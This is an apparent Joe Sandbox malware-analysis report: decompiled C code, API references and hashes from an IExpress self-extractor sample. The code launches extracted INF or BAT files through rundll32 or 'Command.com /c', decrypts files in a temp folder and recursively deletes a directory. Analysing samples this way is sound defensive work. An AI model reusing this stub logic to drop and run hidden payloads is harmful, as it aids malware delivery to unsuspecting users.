Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lega
API String ID: 1032054927-740005631
Opcode ID: db3394edbe87b063f184cf1307829951faf7d343071f509472bc32332eb43a02
Instruction ID: 2d87ba4918ab77b75d5f1de07b141f42f97d5f4f12afb6764ef60abbede11a40
Opcode Fuzzy Hash: db3394edbe87b063f184cf1307829951faf7d343071f509472bc32332eb43a02
Instruction Fuzzy Hash: 43B11072A083019BDB20DF648945F6B76E4EB85740F138D2DFA96D6190DB74CE06CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00AC1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00AC1AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0xac8004; // 0xc32e3ded
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00AC1680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00AC1A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00AC1781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
					E00AC658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00AC1680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E00AC66C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E00AC66C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00AC1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00AC1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E00AC16B3( &_v1552, 0x400, " ");
										E00AC16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00AC2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E00AC171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00AC1A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00AC1A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E00AC44B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0xac9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xac1140, _t156, 8,  &_v268) == 0) {
										 *0xac9a34 =  *0xac9a34 & 0xfffffffb;
										if( *0xac9a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E00AC171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0xac9a34 =  *0xac9a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00AC1680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00AC1680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00AC6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x00ac1af3
0x00ac1afa
0x00ac1b07
0x00ac1b09
0x00ac1b1a
0x00ac1b20
0x00ac1b2c
0x00ac1b3b
0x00ac1b40
0x00ac1b2e
0x00ac1b2e
0x00ac1b33
0x00ac1b33
0x00ac1b46
0x00ac1b4c
0x00ac1b52
0x00ac1b57
0x00ac1b5d
0x00ac1b61
0x00ac1b9f
0x00ac1b9f
0x00ac1bb1
0x00ac1bc2
0x00000000
0x00ac1b63
0x00ac1b63
0x00ac1b65
0x00ac1b68
0x00ac1b68
0x00ac1b6a
0x00ac1b6b
0x00ac1b6f
0x00ac1b74
0x00000000
0x00000000
0x00ac1b76
0x00ac1b7b
0x00ac1b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00ac1b8c
0x00ac1b8c
0x00ac1b98
0x00ac1bc7
0x00ac1bc9
0x00ac1bcc
0x00ac1bd3
0x00ac1d75
0x00ac1d76
0x00ac1d78
0x00ac1d7f
0x00ac1e05
0x00ac1e09
0x00000000
0x00000000
0x00ac1e12
0x00ac1e1b
0x00ac1e73
0x00ac1e21
0x00ac1e21
0x00ac1e28
0x00ac1e37
0x00ac1e3e
0x00ac1e52
0x00ac1e60
0x00ac1e60
0x00ac1e3e
0x00ac1e79
0x00ac1e7b
0x00ac1e84
0x00000000
0x00ac1d9b
0x00ac1d9b
0x00ac1da0
0x00ac1da2
0x00ac1da5
0x00ac1da5
0x00ac1da7
0x00ac1da8
0x00ac1dac
0x00ac1dae
0x00ac1db4
0x00ac1db7
0x00ac1db7
0x00ac1db9
0x00ac1dba
0x00ac1dbe
0x00ac1dc3
0x00ac1dce
0x00ac1dd2
0x00ac1deb
0x00000000
0x00ac1df0
0x00000000
0x00ac1dd2
0x00ac1bf7
0x00ac1bfe
0x00ac1c07
0x00ac1d55
0x00ac1d5a
0x00ac1d5b
0x00ac1d5d
0x00ac1d5e
0x00000000
0x00ac1c1b
0x00ac1c1b
0x00ac1c20
0x00ac1c2c
0x00ac1c33
0x00ac1c38
0x00ac1c3a
0x00ac1c3a
0x00ac1c40
0x00ac1c4b
0x00ac1c4b
0x00ac1c5d
0x00ac1c61
0x00ac1dd4
0x00ac1dd4
0x00ac1dd6
0x00ac1ddb
0x00ac1ddc
0x00ac1dde
0x00ac1d64
0x00ac1d64
0x00ac1d67
0x00ac1d6c
0x00000000
0x00ac1c67
0x00ac1c67
0x00ac1c6d
0x00ac1c72
0x00ac1c74
0x00ac1c74
0x00ac1c8e
0x00ac1c99
0x00ac1cc0
0x00ac1cf8
0x00ac1d07
0x00ac1d23
0x00ac1d09
0x00ac1d14
0x00ac1d1b
0x00ac1d1b
0x00ac1d2b
0x00ac1d2d
0x00ac1d2d
0x00ac1d38
0x00ac1d39
0x00ac1d46
0x00ac1cc2
0x00ac1cc2
0x00ac1ccc
0x00ac1cce
0x00ac1cce
0x00ac1cdb
0x00ac1ce6
0x00ac1cee
0x00ac1cee
0x00ac1e89
0x00ac1e91
0x00ac1e92
0x00ac1e94
0x00ac1e97
0x00ac1ea4
0x00ac1ea4
0x00ac1c61
0x00ac1c07
0x00ac1bd3
0x00ac1b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00AC1BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00AC1BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00AC1C57
GetPrivateProfileIntA.KERNEL32 ref: 00AC1C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00AC1140,00000000,00000008,?), ref: 00AC1CB8
GetShortPathNameA.KERNEL32 ref: 00AC1D1B

Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554

Strings

setupapi.dll, xrefs: 00AC1D23, 00AC1D3A
AdvancedINF, xrefs: 00AC1CAE
", xrefs: 00AC1B25
DefaultInstall, xrefs: 00AC1C74, 00AC1C87, 00AC1CCE, 00AC1CD3, 00AC1D2D, 00AC1D39
setupx.dll, xrefs: 00AC1D14
.INF, xrefs: 00AC1BDB
.BAT, xrefs: 00AC1D83
Reboot, xrefs: 00AC1C82
Version, xrefs: 00AC1CB3
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC1BA0
Command.com /c %s, xrefs: 00AC1D9B, 00AC1DE8
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00AC1D3B

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-2835489207
Opcode ID: d8193b79d3d767b7c0ac25cb10ac59856e1ef08ea9958a0c7c55872152bdc4a1
Instruction ID: d34be2a04a5be22c62e7e629cf9371019ee00d58cc75d9b6766e6049ffd2c362
Opcode Fuzzy Hash: d8193b79d3d767b7c0ac25cb10ac59856e1ef08ea9958a0c7c55872152bdc4a1
Instruction Fuzzy Hash: E4A11970B002186BEB20DB24CC45FFA77A9EB57310F16479DE556E32C2DBB49D868B50

Uniqueness

Uniqueness Score: -1.00%

Function 00AC2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00AC2F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0xac8004; // 0xc32e3ded
				_v8 = _t9 ^ _t46;
				if( *0xac8a38 != 0) {
					L5:
					_t11 = E00AC5164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00AC6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E00AC55A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E00AC658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0xaca288("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0xac8a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0xac8a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0xac8d48 & 0x000000c0;
									if(( *0xac8d48 & 0x000000c0) == 0) {
										_t41 =  *0xac9a40; // 0x3, executed
										_t26 = E00AC256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0xac8a24; // 0x0
									 *0xac9a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0xac8a38;
										if( *0xac8a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00AC4169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0xac9a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00AC3BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0xac8a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00AC3B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E00AC44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0xac9124 = E00AC6285();
							goto L16;
						}
						_t59 =  *0xac9a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E00AC621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0xac8a24;
				if( *0xac8a24 != 0) {
					L4:
					_t34 = E00AC3A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E00AC51E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0xac8a38;
				if( *0xac8a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x00ac2f1d
0x00ac2f28
0x00ac2f2f
0x00ac2f3d
0x00ac2f6c
0x00ac2f6c
0x00ac2f71
0x00ac2f73
0x00ac3041
0x00ac3041
0x00ac3043
0x00ac3053
0x00ac3053
0x00ac2f79
0x00ac2f80
0x00000000
0x00ac2f86
0x00ac2f86
0x00ac2f93
0x00ac2f9e
0x00ac2fa0
0x00ac2fa6
0x00ac2fb8
0x00ac2fba
0x00ac2fbe
0x00ac2fc6
0x00ac2fcc
0x00ac2fd4
0x00ac2fd6
0x00ac2fd8
0x00ac2fe0
0x00ac2fe6
0x00ac2fee
0x00ac2ff0
0x00ac2ff5
0x00ac2ff5
0x00ac2fee
0x00ac2fd4
0x00ac2ff8
0x00ac2ffe
0x00ac3004
0x00ac3017
0x00ac301c
0x00ac3024
0x00ac3054
0x00ac305a
0x00ac3065
0x00ac3065
0x00ac306c
0x00ac306e
0x00ac3075
0x00ac307a
0x00ac307a
0x00ac307c
0x00ac3081
0x00ac3087
0x00ac3089
0x00ac30a1
0x00ac30a1
0x00ac30a9
0x00ac30ab
0x00ac30ad
0x00ac30af
0x00ac30af
0x00ac30ad
0x00ac30b6
0x00000000
0x00ac308b
0x00ac308b
0x00ac3091
0x00000000
0x00000000
0x00ac3093
0x00ac3098
0x00ac309a
0x00000000
0x00000000
0x00ac309c
0x00000000
0x00ac309c
0x00ac3089
0x00ac305c
0x00ac3061
0x00ac3063
0x00000000
0x00000000
0x00000000
0x00ac3063
0x00ac302b
0x00ac3032
0x00ac303c
0x00000000
0x00ac303c
0x00ac3006
0x00ac300c
0x00000000
0x00000000
0x00ac300e
0x00ac3015
0x00000000
0x00000000
0x00000000
0x00ac3015
0x00ac2f80
0x00ac2f3f
0x00ac2f46
0x00ac2f5f
0x00ac2f5f
0x00ac2f64
0x00ac2f66
0x00000000
0x00000000
0x00000000
0x00ac2f66
0x00ac2f4f
0x00000000
0x00000000
0x00ac2f55
0x00ac2f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 00AC2F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00AC2FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00AC2FC6
DecryptFileA.ADVAPI32 ref: 00AC2FE6
FreeLibrary.KERNEL32(00000000), ref: 00AC2FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00AC301C

Part of subcall function 00AC51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00AC2F4D,?,00000002,00000000), ref: 00AC5201

Strings

advapi32.dll, xrefs: 00AC2F99
DecryptFileA, xrefs: 00AC2FC0
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC2FDB, 00AC3017

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-2196669084
Opcode ID: 096f08af24caee4c65a44f7132f6c956ad66f36e7d801ef36e96f3ca78f8c80f
Instruction ID: 5023730a9468b4f6bcb863b02aae6d0dab51450af8dc1d7141eb1324ce9bfd86
Opcode Fuzzy Hash: 096f08af24caee4c65a44f7132f6c956ad66f36e7d801ef36e96f3ca78f8c80f
Instruction Fuzzy Hash: B641B733A002099ADF30EBB59D49F6733E8EB54794F07416DA941C2192EF74CE82CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00AC2390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00AC2390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0xac8004; // 0xc32e3ded
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00AC6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00AC1680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E00AC16B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00AC1680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E00AC16B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E00AC16B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E00AC658A( &_v280, 0x104, 0xac1140);
								E00AC2390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x00ac2398
0x00ac239e
0x00ac23a3
0x00ac23a5
0x00ac23ae
0x00ac23b3
0x00ac24cb
0x00ac24d2
0x00ac24d3
0x00ac24d4
0x00ac24df
0x00ac23c2
0x00ac23d1
0x00ac23db
0x00ac23e4
0x00ac23f6
0x00ac23fc
0x00ac2401
0x00000000
0x00000000
0x00000000
0x00000000
0x00ac2407
0x00ac2407
0x00ac2408
0x00ac2411
0x00ac241f
0x00ac247a
0x00ac2483
0x00ac2495
0x00ac24a3
0x00ac2421
0x00ac242f
0x00ac2453
0x00ac245d
0x00ac2466
0x00ac2472
0x00ac2472
0x00ac242f
0x00ac24af
0x00ac24b5
0x00ac24be
0x00ac24c5
0x00000000
0x00ac24c5

APIs

FindFirstFileA.KERNELBASE(?,00AC8A3A,00AC11F4,00AC8A3A,00000000,?,?), ref: 00AC23F6
lstrcmpA.KERNEL32(?,00AC11F8), ref: 00AC2427
lstrcmpA.KERNEL32(?,00AC11FC), ref: 00AC243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00AC2495
DeleteFileA.KERNEL32(?), ref: 00AC24A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 00AC24AF
FindClose.KERNELBASE(00000000), ref: 00AC24BE
RemoveDirectoryA.KERNELBASE(00AC8A3A), ref: 00AC24C5

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 569da63927736aafafc586e1866df4c370f108e9387371f5f4b215af8866669f
Instruction ID: fa2e2aa64010a3b6a347f90be2d59387ea77d3de28a9eac51535829d47f99ab7
Opcode Fuzzy Hash: 569da63927736aafafc586e1866df4c370f108e9387371f5f4b215af8866669f
Instruction Fuzzy Hash: 4831A132704744ABC320EBA4CE89FEB73ECBBC5345F06492DB59586291EB389909C752

Uniqueness

Uniqueness Score: -1.00%

Function 00AC2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00AC2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0xaca288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0xac9124 = 0;
				if(E00AC2CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00AC2F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E00AC52B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0xac8a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0xac9a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00AC1F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0xac8588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xac9124; // 0x80070002
				return _t7;
			}

0x00ac2c03
0x00ac2c0d
0x00ac2c18
0x00ac2c20
0x00ac2c2e
0x00ac2c32
0x00ac2c36
0x00ac2c3d
0x00ac2c43
0x00ac2c45
0x00ac2c47
0x00ac2c49
0x00ac2c4e
0x00ac2c4e
0x00ac2c47
0x00ac2c32
0x00ac2c20
0x00ac2c50
0x00ac2c54
0x00ac2c57
0x00ac2c64
0x00ac2c66
0x00ac2c6b
0x00ac2c6d
0x00ac2c74
0x00ac2c76
0x00ac2c7c
0x00ac2c7e
0x00ac2c87
0x00ac2c89
0x00ac2c89
0x00ac2c87
0x00ac2c7c
0x00ac2c74
0x00ac2c8e
0x00ac2c95
0x00ac2c98
0x00ac2c98
0x00ac2c9e
0x00ac2ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00AC6BB0,00AC0000,00000000,00000002,0000000A), ref: 00AC2C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00AC6BB0,00AC0000,00000000,00000002,0000000A), ref: 00AC2C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00AC2C28
CloseHandle.KERNEL32(00000000,?,?,00AC6BB0,00AC0000,00000000,00000002,0000000A), ref: 00AC2C98

Strings

HeapSetInformation, xrefs: 00AC2C22
Kernel32.dll, xrefs: 00AC2C13

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: bce71e99a48174c10c9f154ef3546d808f03261c0ec90ed626be6b45b19b2c6d
Instruction ID: e51b32318f67e0f003aff7b02d009ae68151153bcac2bbb1945d9efefc1e8351
